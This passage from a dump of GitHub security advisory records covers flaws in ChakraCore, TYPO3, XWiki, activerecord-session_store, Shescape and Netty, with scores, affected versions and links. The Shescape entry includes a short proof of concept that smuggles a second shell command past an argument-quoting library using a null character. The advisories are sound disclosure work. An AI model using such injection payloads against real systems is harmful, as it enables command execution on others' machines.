'https://lists.apache.org/thread.html/r35ab810c0f3016b3fd3a3fa9088a2d2781b354a810780ce74d022b6c@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3ce0e31b25ad4ee8f7c42b62cfdc72d1b586f5d6accd23f5295b6dd1@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r409ee2bae66bfff6aa89e6c74aff535e6248260d3afcb42bfb3b316b@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r463b12b27264c5e1e3c48c8c2cc5d33813d2f0d981102548fb3102fb@%3Cissues.nifi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r492cff8488a7f6eb96700afb5d137b719ddb80a833e77f971d2691c6@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4a456d89a83752a012d88a60ff4b21def6c9f650b9e69ea9fa11c9f9@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4c92ea39167c0f7b096ae8268db496b5451d69606f0304b7c8a994c7@%3Cissues.nifi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r51f8975ef47c12a46fbfd7da9efea7f08e1d307fe1dc3042514659ae@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r521a077885ce79c44a799118c878589e81e525cab72d368e5cfb6f61@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5612dc69e1f79c421faf9764ffbc92591e2a69ea417c04cba57f49ea@%3Cuser.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r562a0cbc5c8cac4d000a27b2854a8ab1b924aa9dd45f8ffbea98e5ad@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5b7cc6ac733e0b35816751cf45d152ae246a3f40e0b1e62b101c9522@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r601f15f3de7ae3a7bbcd780c19155075c56443c2cdc1d193c03b4182@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r734f996149bb9b1796740385fcbdf3e093eb9aabedc0f20a48ea1d68@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r75ee2a529edb892ac59110cb3f6f91844a932c5034e16c8317f5668d@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7f4ad5eec0bce2821c308bb23cac53df5c94eb84de1c58de9b95c176@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7fbdb7880be1566f943d80fbbeefde2115c086eba1bef3115350a388@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7ffd050d3bd7c90d95f4933560b5f4f15971ab9a5f5322fdce116243@%3Cdev.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r855b24a3bde3674256152edfc53fb8c9000f9b59db3fecbbde33b211@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r857b31ad16c6e76002bc6cca73c83358ed2595477e288286ee82c48d@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r897a6a14d03eab09e89b809d2a650f3765065201da5bc3db9a4dd6e8@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8b1963f16d6cb1230ca7ee73b6ec4f5c48f344191dbb1caabd265ee4@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8dc1b13b80d39fbf4a9d158850e15cd868f0460c2f364f13dca7050b@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra2f529da674f25a7351543544f7d621b5227c49a0745913b1194d11e@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra384892bab8c03a60613a6a9d5e9cae0a2b800fd882792a55520115e@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra40a88a2301a3da86e25b501ff4bc88124f2b816c2917d5f3497f8f0@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra47a26c008487b0a739a368c846e168de06c3cd118d31ecedafa679a@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raa6d60b00b67c0550672b4f506f0df75b323dcd25cf574e91e2f2dff@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb79b62ac3085e05656e41865f5a7efcbdc7dcd7843abed9c5fe0fef8@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc052fd4e9e9c01bead74c0b5680355ea5dc3b72d46f253cb65d03e43@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc721fe2910533bffb6bd4d69ea8ff4f36066d260dbcd2d14e041614a@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd666e187ebea2fda8624683ab51e2a5ad2108f762d21bf1a383d7502@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd8e24a3e482e5984bc8c5492dc790413e4fdc1234e3debb94515796b@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd6c47321db1bfe12c68a898765bf3b6f97e2afa6a501254ed4feaed@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re03a4dbc15df6f390a2f8c0a071c31c8324dbef007e59fdc2592091a@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re0d38cc2b5da28f708fc89de49036f3ace052c47a1202f7d70291614@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re19fa47ec901cc3cf6d7784027198e8113f8bc2dbfd6c9d6d13f5447@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re3bd4f831f9be49871cb6adb997289b5dbcd6fe4bc5cb08223254080@%3Cdev.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re43768896273c0b5f1a03d7f0a9d370852074489d51825fdc0d77f0f@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re819198d4732804dc01fca8b5b144689a118ede49f6128968773595c@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reb3c6dc050c7ee18ea154cd94dba85d99aa6b02b84c4bb2138a4abf2@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reca91f217f9e1ce607ce6e19a1c0b3db82b5b1b58cf39a84d6434695@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf190d1d28e1367d1664ef6bc2f71227566d7b6b39209817a5364da1f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf6c2efa3137bc8c22707e550a1f9b80f74bca62b9c8a6f768f2c6b86@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf77f4c4583669f1133d58cc4f1964367e253818ed8db986bb2732f7c@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rff630ce92a4d1bb494fc1a3f9b57a3d60819b436505bcd8c6ccc713c@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210401-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-10T03:46:22Z', 'nvd_published_at': '2021-02-26T22:15:00Z'}" +1.4.0,GHSA-rx34-jff5-ph35,2021-03-18T21:48:50Z,2021-03-29T21:00:06Z,,['CVE-2019-0917'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0917'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/b5f8fad1b00087bd0a24cc173c2dfedc4f8aee33'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0917'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:48:50Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-2r6j-862c-m2v2,2021-03-29T18:01:54Z,2021-03-23T01:53:52Z,,['CVE-2021-21355'],Unrestricted File Upload in Form Framework," +### Problem +Due to the lack of ensuring file extensions belong to configured allowed mime-types, attackers can upload arbitrary data with arbitrary file extensions - however, default _fileDenyPattern_ successfully blocked files like _.htaccess_ or _malicious.php_. + +TYPO3 Extbase extensions, which implement a file upload and do not implement a custom _TypeConverter_ to transform uploaded files into _FileReference_ domain model objects are affected by the vulnerability as well, since the _UploadedFileReferenceConverter_ of _ext:form_ handles the file upload and will accept files of any mime-type which are persisted to the default location. + +In any way, uploaded files are placed in the default location _/fileadmin/user_upload/_, in most scenarios keeping the submitted filename - which allows attackers to directly reference files, or even correctly guess filenames used by other individuals, disclosing this information. + +No authentication is required to exploit this vulnerability. + +### Solution +Update to TYPO3 versions 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described. + +Type converter _UploadedFileReferenceConverter_ is not registered globally anymore and just handles uploaded files within the scope of the Form Framework. Guessable storage location has changed from _/fileadmin/user_upload/form\_\/_ to _/fileadmin/form_uploads/_. Allowed mime-types must match expected file extensions (e.g. _application/pdf_ must be _.pdf_, and cannot be _.html_). + +Extbase extensions, who rely on the global availability of the _UploadedFileReferenceConverter_ must now implement a custom _TypeConverter_ to handle file uploads or explicitly implement the ext:form _UploadedFileReferenceConverter_ with appropriate setting for accepted mime-types. + +### Credits +Thanks to Sebastian Michaelsen, Marc Lindemann, Oliver Eglseder, Markus Volkmer, Jakob Kunzmann, Johannes Regner, Richie Lee who reported this issue, and to TYPO3 core & security team members Oliver Hader & Benni Mack, as well as TYPO3 contributor Ralf Zimmermann who fixed the issue. + +### References +* [TYPO3-CORE-SA-2021-002](https://typo3.org/security/advisory/typo3-core-sa-2021-002)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L/E:F/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.40'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.7.39'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.5.24'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.13'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-2r6j-862c-m2v2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21355'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/typo3/cms-form'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-002'}]","{'cwe_ids': ['CWE-434', 'CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T01:41:38Z', 'nvd_published_at': '2021-03-23T02:15:00Z'}" +1.4.0,GHSA-pcgf-qjx2-qv4q,2021-03-23T15:04:45Z,2021-03-29T20:56:08Z,,['CVE-2019-1217'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1237, CVE-2019-1298, CVE-2019-1300.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1217'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/7e9a2ee60baa95ceb4f48f522f823c812ca90c80'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/b75847eb1ef4136d49e119c072266d8874a6e41e'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1217'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:04:45Z', 'nvd_published_at': '2019-09-11T22:15:00Z'}" +1.4.0,GHSA-cvw2-xj8r-mjf7,2023-09-05T22:00:39Z,2021-03-09T00:45:31Z,,['CVE-2019-25025'],Activerecord-session_store Vulnerable to Timing Attack,"The `activerecord-session_store` (aka Active Record Session Store) component through 1.1.3 for Ruby on Rails does not use a constant-time approach when delivering information about whether a guessed session ID is valid. Consequently, remote attackers can leverage timing discrepancies to achieve a correct guess in a relatively short amount of time. This is a related issue to CVE-2019-16782. + +## Recommendation + +This has been fixed in version 2.0.0. All users are advised to update to this version or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'activerecord-session_store'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25025'}, {'type': 'WEB', 'url': 'https://github.com/rails/activerecord-session_store/pull/151'}, {'type': 'WEB', 'url': 'https://github.com/rails/activerecord-session_store/commit/9d4dd113d3010b82daaadf0b0ee6b9fb2afb2160'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/activerecord-session_store'}, {'type': 'WEB', 'url': 'https://github.com/rails/activerecord-session_store/releases/tag/v2.0.0'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/activerecord-session_store/CVE-2019-25025.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/activerecord-session_store'}]","{'cwe_ids': ['CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-09T00:45:19Z', 'nvd_published_at': '2021-03-05T06:15:00Z'}" +1.4.0,GHSA-2452-3rwv-x89c,2021-03-23T15:13:35Z,2021-03-29T20:56:01Z,,['CVE-2019-1298'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1217, CVE-2019-1237, CVE-2019-1300.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1298'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/7e9a2ee60baa95ceb4f48f522f823c812ca90c80'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/fe8f981f8e426ff61159e750a368e94ecbb87782'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1298'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:13:35Z', 'nvd_published_at': '2019-09-11T22:15:00Z'}" +1.4.0,GHSA-79rg-7mv3-jrr5,2021-03-23T22:34:44Z,2021-03-23T22:48:01Z,,['CVE-2021-21380'],Rating Script Service expose XWiki to SQL injection,"### Impact +This issue impacts only XWiki with the Ratings API installed. +The Rating Script Service expose an API to perform SQL requests without escaping the from and where search arguments. +This might lead to an SQL script injection quite easily for any user having Script rights on XWiki. + +### Patches +The problem has been patched in XWiki 12.9RC1. + +### Workarounds +The only workaround besides upgrading XWiki would be to uninstall the Ratings API in XWiki from the Extension Manager. + +### References +https://jira.xwiki.org/browse/XWIKI-17662 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Jira XWiki](http://jira.xwiki.org) +* Email us at our [security mailing list](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-ratings-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-79rg-7mv3-jrr5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21380'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-17662'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T22:34:44Z', 'nvd_published_at': '2021-03-23T23:15:00Z'}" +1.4.0,GHSA-f2rp-38vg-j3gh,2021-03-18T23:43:39Z,2021-03-18T23:47:56Z,,['CVE-2021-21384'],Null characters not escaped,"### Impact + +Anyone using _Shescape_ to defend against shell injection may still be vulnerable against shell injection if the attacker manages to insert a [null character](https://en.wikipedia.org/wiki/Null_character) into the payload. For example (on Windows): + +```javascript +const cp = require(""child_process""); +const shescape = require(""shescape""); + +const nullChar = String.fromCharCode(0); +const payload = ""foo\"" && ls -al ${nullChar} && echo \""bar""; +console.log(cp.execSync(`echo ${shescape.quote(payload)}`)); +// foototal 3 +// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:44 . +// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 00:09 .. +// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:42 folder +// -rw-r--r-- 1 owner XXXXXX 0 Mar 13 18:42 file +``` + +### Patches + +The problem has been patched in [v1.1.3](https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3) which you can upgrade to now. No further changes are required. + +### Workarounds + +Alternatively, null characters can be stripped out manually using e.g. `arg.replace(/\u{0}/gu, """")`","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'shescape'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/security/advisories/GHSA-f2rp-38vg-j3gh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21384'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/shescape'}]","{'cwe_ids': ['CWE-88'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:43:39Z', 'nvd_published_at': '2021-03-19T00:15:00Z'}" +1.4.0,GHSA-f256-j965-7f32,2022-02-08T21:31:25Z,2021-03-30T15:10:38Z,,['CVE-2021-21409'],Possible request smuggling in HTTP/2 due missing validation of content-length,"### Impact +The content-length header is not correctly validated if the request only use a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1 + +This is a followup of https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj which did miss to fix this one case. + +### Patches +This was fixed as part of 4.1.61.Final + +### Workarounds +Validation can be done by the user before proxy the request by validating the header.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-codec-http2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.61.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21409'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/b0fa4d5aab4215f3c22ce6123dd8dd5f38dc0432'}, {'type': 'WEB', 'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21295'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b09f3e31e004fe583f677f7afa46bd30110904576c13c5ac818ac2c@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0ca82fec33334e571fe5b388272260778883e307e15415d7b1443de2@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r101f82d8f3b5af0bf79aecbd5b2dd3b404f6bb51d1a54c2c3d29bed9@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b3cb056364794f919aaf26ceaf7423de64e7fdd05a914066e7d5219@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2732aa3884cacfecac4c54cfaa77c279ba815cad44b464a567216f83@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r31044fb995e894749cb821c6fe56f487c16a97028e6e360e59f09d58@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4a98827bb4a7edbd69ef862f2351391845697c40711820d10df52ca5@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4b8be87acf5b9c098a2ee350b5ca5716fe7afeaf0a21a4ee45a90687@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4ea2f1a9d79d4fc1896e085f31fb60a21b1770d0a26a5250f849372d@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r584cf871f188c406d8bd447ff4e2fd9817fca862436c064d0951a071@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5baac01f9e06c40ff7aab209d5751b3b58802c63734e33324b70a06a@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5cbea8614812289a9b98d0cfc54b47f54cef424ac98d5e315b791795@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5f2f120b2b8d099226473db1832ffb4d7c1d6dc2d228a164bf293a8e@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r602e98daacc98934f097f07f2eed6eb07c18bfc1949c8489dc7bfcf5@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r61564d86a75403b854cdafee67fc69c8b88c5f6802c2c838f4282cc8@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r69efd8ef003f612c43e4154e788ca3b1f837feaacd16d97854402355@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6dac9bd799ceac499c7a7e152a9b0dc7f2fe7f89ec5605d129bb047b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70c3a7bfa904f06a1902f4df20ee26e4f09a46b8fd3eb304dc57a2de@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7879ddcb990c835c6b246654770d836f9d031dee982be836744e50ed@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7b54563abebe3dbbe421e1ba075c2030d8d460372f8c79b7789684b6@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r823d4b27fcba8dad5fe945bdefce3ca5a0031187966eb6ef3cc22ba9@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r855b4b6814ac829ce2d48dd9d8138d07f33387e710de798ee92c011e@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r967002f0939e69bdec58f070735a19dd57c1f2b8f817949ca17cddae@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ec78dc409f3f1edff88f21cab53737f36aad46f582a9825389092e0@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9fe840c36b74f92b8d4a089ada1f9fd1d6293742efa18b10e06b66d2@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra64d56a8a331ffd7bdcd24a9aaaeeedeacd5d639f5a683389123f898@%3Cdev.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra655e5cec74d1ddf62adacb71d398abd96f3ea2c588f6bbf048348eb@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra66e93703e3f4bd31bdfd0b6fb0c32ae96b528259bb1aa2b6d38e401@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 